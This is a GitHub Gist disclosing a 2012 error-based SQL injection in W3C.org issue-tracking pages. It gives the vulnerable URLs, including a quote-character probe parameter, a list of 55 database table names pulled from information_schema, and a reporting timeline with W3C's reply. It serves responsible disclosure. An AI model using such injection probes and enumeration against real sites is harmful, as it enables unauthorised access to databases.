Created
April 29, 2014 12:34
-
-
Save totallyunknown/11398969 to your computer and use it in GitHub Desktop.
W3C SQL Injection (10/2012)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
W3C.org was vulnerable to error based SQL injection: | |
http://www.w3.org/WAI/GL/WCAG20/issue-tracking/viewdata_individual.php?id=1 | |
http://www.w3.org/WAI/GL/WCAG20/issue-tracking/resolutions/no_response_results.php?frum=%22 | |
select table_name from information_schema.tables [55]: | |
[*] AC200011FollowUp | |
[*] acmfastsurvey | |
[*] ACSurvey200210 | |
[*] CHARACTER_SETS | |
[*] COLLATION_CHARACTER_SET_APPLICABILITY | |
[*] COLLATIONS | |
[*] COLUMN_PRIVILEGES | |
[*] COLUMNS | |
[*] commentsTracker | |
[*] cookies | |
[*] dog | |
[*] ENGINES | |
[*] EVENTS | |
[*] FILES | |
[*] GLOBAL_STATUS | |
[*] GLOBAL_VARIABLES | |
[*] human | |
[*] KEY_COLUMN_USAGE | |
[*] messages | |
[*] PARTITIONS | |
[*] PLUGINS | |
[*] PROCESSLIST | |
[*] PROFILING | |
[*] prospective_members | |
[*] REFERENTIAL_CONSTRAINTS | |
[*] resource | |
[*] resources | |
[*] reviewedSpecifications | |
[*] ROUTINES | |
[*] SCHEMA_PRIVILEGES | |
[*] SCHEMATA | |
[*] SESSION_STATUS | |
[*] SESSION_VARIABLES | |
[*] specSections | |
[*] STATISTICS | |
[*] TABLE_CONSTRAINTS | |
[*] TABLE_PRIVILEGES | |
[*] TABLES | |
[*] testac | |
[*] testad | |
[*] testae | |
[*] toy | |
[*] toy2 | |
[*] toy3 | |
[*] TRIGGERS | |
[*] triples | |
[*] trrdf_id2val | |
[*] trrdf_store_var | |
[*] trrdf_triple | |
[*] trrdf_triple_dup | |
[*] uri | |
[*] USER_PRIVILEGES | |
[*] VIEWS | |
[*] wgOptions | |
[*] xpointerRegistry | |
Timeline: | |
15/10/2012 Initial Report | |
15/10/2012 Acknowledged by W3C | |
26/10/2012 Bugs still unfixed, asked again for status | |
27/10/2012 Got Feedback from W3C: | |
"Thanks very much for bringing this to our attention, and for | |
following up. Many of my colleagues are traveling this week but I | |
expect we will be able to get these fixed sometime within the | |
next few days." | |
Didn't know, when they exactly fixed these issues. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment